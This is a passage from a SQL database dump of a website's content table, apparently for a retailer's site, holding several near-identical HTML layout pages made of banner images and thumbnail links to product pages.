src=\"http://www.paulgrahamltd.com/EditorImages/image/barrett quad/small/quad visual.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY3\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/014.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY4\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/015.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY5\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/016.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcw\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/017.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcx\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/018.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcy\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/019.jpg\" /></a></p>\r\n<br />\r\n<p> <img width=\"724\" height=\"2000\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/layout text/layout final.jpg\" /></p>\r\n<p class=\"MsoNormal\"><span> </span> </p>\r\n<p> </p>','','','','','','','','','N','2013-04-03 19:58:03','2013-02-13 19:44:12',158),(157,'Layout1','1','3','ultimate3.php','3','3','3','<p><img width=\"726\" height=\"113\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" /><img width=\"726\" height=\"509\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/large/005.jpg\" /></p>\r\n<br />\r\n<p><a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU1\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/001.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU2\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/002.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ0\"><img width=\"121\" height=\"85\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/003.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU4\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/004.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU5\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/006.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYw\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/007.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYx\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/008.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYy\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/009.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYz\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/010.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY0\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/011.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY1\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/012.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY2\"><img width=\"118\" height=\"86\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/barrett quad/small/quad visual.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY3\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/014.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY4\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/015.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY5\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/016.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcw\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/017.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcx\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/018.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcy\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/019.jpg\" /></a></p>\r\n<br />\r\n<p> <img width=\"724\" height=\"2000\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/layout text/layout final.jpg\" /></p>\r\n<p class=\"MsoNormal\"><span> </span> </p>\r\n<p> </p>','','','','','','','','','N','2013-04-03 19:58:26','2013-02-13 19:44:41',159),(158,'Layout1','1','4','ultimate4.php','4','4','4','<p><img width=\"726\" height=\"113\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" /><img width=\"726\" height=\"509\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/large/004.jpg\" /></p>\r\n<br />\r\n<p><a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU1\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/001.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU2\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/002.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU3\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/005.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ0\"><img width=\"121\" height=\"85\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/003.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU5\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/006.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYw\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/007.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYx\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/008.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYy\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/009.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYz\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/010.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY0\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/011.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY1\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/012.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY2\"><img width=\"118\" height=\"86\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/barrett quad/small/quad visual.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY3\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/014.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY4\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/015.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY5\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/016.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcw\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/017.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcx\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/018.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcy\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/019.jpg\" /></a></p>\r\n<br />\r\n<p> <img width=\"724\" height=\"2000\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/layout text/layout final.jpg\" /></p>\r\n<p class=\"MsoNormal\"><span> </span> </p>\r\n<p> </p>','','','','','','','','','N','2013-04-03 19:58:46','2013-02-13 19:45:14',160),(159,'Layout1','1','5','ultimate5.php','5','5','5','<p><img width=\"726\" height=\"113\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" /><img width=\"726\" height=\"509\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/large/006.jpg\" /></p>\r\n<br />\r\n<p><a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU1\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/001.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU2\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/002.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU3\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/005.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU4\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/004.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ0\"><img width=\"121\" height=\"85\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/003.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYw\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/007.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYx\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/008.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYy\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/009.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYz\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/010.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY0\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/011.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY1\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/012.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY2\"><img width=\"118\" height=\"86\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/barrett quad/small/quad visual.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY3\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/014.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY4\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/015.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY5\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/016.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcw\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/017.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcx\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/018.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcy\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/019.jpg\" /></a></p>\r\n<br />\r\n<p> <img width=\"724\" height=\"2000\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/layout text/layout final.jpg\" /></p>\r\n<p class=\"MsoNormal\"><span> </span> </p>\r\n<p> </p>','','','','','','','','','N','2013-04-03 19:59:12','2013-02-13 19:45:49',161),(160,'Layout1','1','6','ultimate6.php','6','6','6','<p><img width=\"726\" height=\"113\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" alt=\"\" /><img width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/large/007.jpg\" alt=\"\" /></p>\r\n<br />\r\n<p><a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU1\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/001.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU2\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/002.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU3\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/005.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU4\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/004.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ0\"><img width=\"121\" height=\"85\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/003.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU5\"><img width=\"121\" height=\"85\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/006.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYx\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/008.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYy\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/009.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYz\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/010.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY0\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/011.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY1\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/012.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY2\"><img width=\"118\" height=\"86\" src=\"http://www.paulgrahamltd.com/EditorImages/image/barrett quad/small/quad visual.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY3\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/014.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY4\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/015.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY5\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/016.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcw\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/017.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcx\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/018.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcy\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/019.jpg\" alt=\"\" /></a></p>\r\n<br />\r\n<p> <img width=\"724\" height=\"2000\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/layout text/layout final.jpg\" alt=\"\" /></p>\r\n<p class=\"MsoNormal\"><span> </span> </p>\r\n<p> </p>','','','','','','','','','N','2013-04-03 19:57:11','2013-02-13 19:46:24',162),(161,'Layout1','1','7','ultimate7.php','7','7','7','<p><img width=\"726\" height=\"113\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" alt=\"\" /><img width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/large/008.jpg\" alt=\"\" /></p>\r\n<br />\r\n<p><a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU1\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/001.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU2\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/002.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU3\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/005.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU4\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/004.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU5\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/006.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYw\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/007.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ0\"><img width=\"121\" height=\"85\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/003.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYy\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/009.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYz\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/010.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY0\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/011.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY1\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/012.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY2\"><img width=\"118\" height=\"86\" src=\"http://www.paulgrahamltd.com/EditorImages/image/barrett quad/small/quad visual.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY3\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/014.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY4\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/015.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY5\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/016.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcw\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/017.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcx\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/018.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcy\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/019.jpg\" alt=\"\" /></a></p>\r\n<br />\r\n<p> <img width=\"724\" height=\"2000\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/layout text/layout final.jpg\" alt=\"\" /></p>\r\n<p class=\"MsoNormal\"><span> </span> </p>\r\n<p> </p>','','','','','','','','','N','2013-04-03 20:00:17','2013-02-13 19:46:49',163),(162,'Layout1','1','8','ultimate8.php','8','8','8','<p><img width=\"726\" height=\"113\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" alt=\"\" /><img width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/large/009.jpg\" alt=\"\" /></p>\r\n<br />\r\n<p><a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU1\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/001.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU2\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/002.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU3\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/005.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU4\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/004.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU5\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/006.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYw\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/007.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYx\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/008.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ0\"><img width=\"121\" height=\"85\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/003.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYz\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/010.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY0\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/011.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY1\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/012.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY2\"><img width=\"118\" height=\"86\" src=\"http://www.paulgrahamltd.com/EditorImages/image/barrett quad/small/quad visual.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY3\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/014.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY4\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/015.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY5\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/016.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcw\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/017.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcx\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page 